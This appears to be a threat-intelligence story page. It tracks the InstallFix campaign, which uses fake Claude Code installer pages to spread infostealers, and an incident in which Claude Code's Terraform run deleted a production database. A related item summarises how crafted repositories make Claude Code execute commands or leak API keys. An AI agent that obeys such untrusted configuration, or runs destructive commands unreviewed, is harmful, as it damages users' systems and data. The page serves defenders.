Malicious and unsafe use of Anthropic Claude Code leading to malware delivery and destructive infrastructure changes
Push Security reported an “InstallFix” malvertising campaign targeting developers searching for Anthropic’s Claude Code CLI. Attackers clone the legitimate installation page on lookalike domains and buy Google Search ads so the fake pages rank highly for queries like “install Claude Code” and “Claude Code CLI.” While links on the page route to Anthropic’s real site, the copy‑paste install one‑liners are replaced with malicious commands that fetch malware from attacker-controlled infrastructure; the Windows flow was observed delivering the Amatera Stealer, with macOS users likely targeted by similar info-stealing malware.
Separately, a reported operational incident highlighted the risk of delegating privileged infrastructure actions to AI agents without strong guardrails: a developer described using Claude Code to run Terraform changes during an AWS migration and, after a missing Terraform state file led to duplicate resources, subsequent cleanup actions resulted in the deletion of production components, including a database and recovery snapshots—wiping roughly 2.5 years of records. Together, the reports underscore two distinct but compounding risks around AI coding agents: supply-chain style social engineering via fake install instructions and high-impact misexecution when AI-driven automation is allowed to operate with destructive permissions in production environments.
How this story unfolded
12 events from the earliest known activity through the most recent confirmed update.
Developer's Claude Code/Terraform run destroys two AWS website environments
During a migration of AI Shipping Labs to AWS infrastructure shared with DataTalks.Club, Alexey Grigorev provided Terraform state late, causing Claude Code to follow that state and execute a Terraform destroy. The action wiped both sites' infrastructure, including a database and snapshots containing about 2.5 years of records.
Grigorev publishes post-mortem and hardening changes
In a post-mortem, Grigorev said he would test restores, add deletion protections and tighter permissions, move Terraform state to S3, and require manual review and execution for destructive actions instead of letting the AI agent run them directly.
Amazon Business Support helps restore deleted AWS data
After the destructive Terraform action, Grigorev contacted Amazon Business Support, which assisted with restoring the lost data. The recovery reportedly took about a day.
Researchers identify fake Claude Code install pages in Google ads
Security researchers reported a malvertising campaign using lookalike Claude Code installation pages and sponsored Google Search results to trick users into copying malicious install commands. The tactic was described as an "InstallFix" attack that weaponizes trusted one-line terminal commands.
Push Security links Windows infection chain to Amatera Stealer
Analysis of the fake Claude Code campaign showed Windows victims were led through a staged execution chain involving cmd.exe and mshta.exe to retrieve attacker-hosted payloads. The resulting malware was identified as Amatera Stealer, an infostealer targeting credentials, cookies, tokens, and system data.
Bitdefender documents Windows and macOS malware from fake Claude Code ads
Bitdefender reported that a fake Claude Code documentation site hosted on a Squarespace subdomain delivered OS-specific malware via ClickFix-style instructions. On Windows it deployed multi-stage stealer payloads, while on macOS it delivered an obfuscated universal Mach-O backdoor capable of remote shell execution.
Google deactivates advertiser account tied to fake Claude Code campaign
Bitdefender said the malicious ad campaign likely used a compromised advertiser account associated with a Malaysian company. Google reportedly deactivated that advertiser account after the abuse was identified.
Expel reveals InstallFix scale and MSIX-based Claude Code variant
Expel reported that InstallFix-style fake software install pages had become widespread, accounting for 13% of malware incidents it observed in March 2026, and identified 46 malicious Anthropic-themed webpages over the prior month. The firm also described a GitLab.io-hosted fake Claude Code page that used mshta to fetch a file named claude.msixbundle containing hidden malicious HTML as an anti-analysis technique.
NordVPN uncovers malware campaign impersonating Google Gemini CLI
NordVPN reported active campaigns using fake websites, cloned repositories, deceptive social posts, and planned typosquatted npm packages to impersonate Google Gemini CLI and trick developers into installing malware. The macOS variant used a Base64-encoded terminal command to download and run a malicious script with elevated privileges, while the Windows variant used a disguised PowerShell fileless attack to provide remote access and enable theft or lateral movement.
Gurucul publishes IOCs and detection guidance for InstallFix Claude Code campaign
Gurucul released additional technical analysis of the fake Claude Code InstallFix campaign, describing PowerShell- and mshta-based fileless execution, AMSI bypass, disabled SSL certificate validation, victim-specific command-and-control URLs, and persistence via scheduled tasks. The report also published indicators of compromise and detection queries covering malicious domains, URLs, IPs, hashes, and filenames tied to the activity.
Trend Micro links fake Claude installer campaign to RedLine Stealer activity
Trend Micro reported that the InstallFix-style fake Claude AI installer campaign used paid Google ads and OS-specific social engineering to infect Windows and macOS users, and said the infrastructure and behaviors closely aligned with RedLine Stealer activity. The company also noted observed victims in the United States, Malaysia, the Netherlands, and Thailand across government, education, electronics, and food and beverage sectors.
Ontinue details browser-secret theft in fake Claude Code installer campaign
Ontinue reported an ongoing campaign using sponsored search results and lookalike Claude Code install pages to swap a legitimate one-line installer for an attacker-controlled PowerShell command. The payload abuses Chromium's IElevator2 COM interface to recover encryption keys and decrypt browser-stored cookies, passwords, and payment data, while using Cloudflare-fronted domains and rendered HTML to conceal malicious behavior.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
12 references tracked. Mallory keeps watching after this page renders.
Fake Claude Code Installer Targets Developers With Browser Credential Stealer
hackread.com
Open sourceBehind a Fake Claude Code Installer
ontinue.com
Open sourceCookie thieves caught stealing dev secrets
theregister.com
Open sourceHackers Using Fake Claude AI Installer Pages to Trick Users Into Running Malware on Their Systems
cybersecuritynews.com
Open sourceInstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise | Community Portal | Gurucul
community.gurucul.com
Open sourceDevelopers warned to avoid 'early-access' Google Gemini tools | IT Pro
itpro.com
Open sourceInstallFix: Not the application you were looking for | Expel
expel.com
Open sourceFake Claude Code Spreads Malware to Windows, macOS Users - TechRepublic
techrepublic.com
Open sourceWindows and macOS Malware Spreads via Fake “Claude Code” Google Ads
bitdefender.com
Open sourceFake Claude Code install pages highlight rise of "InstallFix" attacks - Help Net Security
helpnetsecurity.com
Open sourceClaude Code deletes developers' production setup, including its database and snapshots - 2.5 years of records were nuked in an instant | Tom's Hardware
tomshardware.com
Open sourceInstallFix: Dissecting a Multi-Stage Infostealer Campaign Hiding Behind Fake Claude Code Installers - Breakglass Intelligence - Breakglass Intelligence
intel.breakglass.tech
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
Malvertising and Supply-Chain Lures Impersonate AI Developer Tools to Deliver Infostealers and RATs
Threat actors are abusing interest in AI developer tools by impersonating installers and setup guides to trick users into executing malware. Fake installation-guide pages for Anthropic’s **Claude Code** were promoted via **Google Ads** to rank highly for searches like “Claude Code install/CLI,” leading Windows and macOS users to run copy-pasted commands in an **InstallFix** campaign (a variant of **ClickFix**) that ultimately deployed **Amatera** (an **ACR Stealer**-based MaaS infostealer). Push Security reported the malware steals browser-stored credentials, cookies, session tokens, and system information, and the infrastructure used legitimate hosting/CDN services (e.g., *Squarespace*, *Cloudflare Pages*, *Tencent EdgeOne*) to reduce suspicion. In a related AI-tool impersonation theme, JFrog identified a malicious **npm** package, `@openclaw-ai/openclawai`, posing as an **OpenClaw** installer that targets macOS users to steal credentials and establish persistent remote access. The package uses a `postinstall` hook to reinstall itself globally and registers a CLI via the `bin` field pointing to `scripts/setup.js`, which presents a fake installer UI and then prompts for the user’s system password via a bogus Keychain/iCloud authorization flow. The malware (self-identified as **GhostLoader**) was reported to collect browser data, crypto wallets, SSH keys, Apple Keychain databases, and iMessage history, while also deploying a **RAT** with **SOCKS5 proxy** capability and “live browser session cloning,” indicating a blend of credential theft and long-term access objectives.
Apr 1, 2026
Vulnerabilities in Anthropic Claude Code Enable Code Execution and API Key Exfiltration
Security researchers disclosed multiple vulnerabilities in **Anthropic’s Claude Code** AI coding assistant that could enable **arbitrary command execution** and **exfiltration of Anthropic API credentials** when developers clone/open a malicious repository. Check Point Research reported the issues abuse Claude Code configuration and initialization paths—particularly **project hooks** (e.g., untrusted `.claude/settings.json`), **Model Context Protocol (MCP) servers**, and **environment variables**—to trigger shell command execution and data theft. Anthropic’s advisory for **CVE-2026-21852** describes a project-load flow where a crafted repo can set `ANTHROPIC_BASE_URL` to an attacker-controlled endpoint, causing Claude Code to send API requests **before** the trust prompt is shown, potentially leaking the user’s API key. The disclosed issues include two high-severity code-injection paths (CVSS **8.7**) and one information-disclosure flaw (CVSS **5.3**): a consent-bypass/hook-based injection issue fixed in *Claude Code* **1.0.87** (Sept 2025), **CVE-2025-59536** fixed in **1.0.111** (Oct 2025), and **CVE-2026-21852** fixed in **2.0.65** (Jan 2026). Separate coverage framed Anthropic-related developments as market-moving, noting investor attention around Anthropic’s AI code-security tooling; however, the actionable security impact in this reporting is the risk that simply opening an attacker-controlled repository can lead to **RCE** and **credential leakage**, reinforcing the need to treat untrusted repos and tool initialization behaviors as a supply-chain and developer-workstation risk.
May 7, 2026
InstallFix malvertising campaign spreads fake Claude Code installers to deliver Amatera Stealer
Push Security reported a new **ClickFix-style** social-engineering campaign dubbed **InstallFix** that uses **Google-sponsored search ads** to drive developers to near-identical cloned “install” pages for *Anthropic Claude Code* and similar AI coding tools. Victims are prompted to copy/paste terminal commands from the fake pages; executing them installs **Amatera Stealer**, enabling credential theft and potential access to enterprise development environments. Separate reporting highlighted adjacent browser-based tradecraft: a previously legitimate Chrome extension (*QuickLens – Search Screen with Google Lens*) with roughly **7,000 users** was updated to deploy **ClickFix** attacks, strip web security headers, and steal cryptocurrency wallet seed phrases before being removed from the Chrome Web Store. A weekly threat bulletin also noted unrelated incidents (e.g., ransomware and data breaches) and separate AI-themed malicious extensions that harvest LLM chat histories, but those items are not part of the InstallFix/Claude Code malvertising campaign itself.
Mar 21, 2026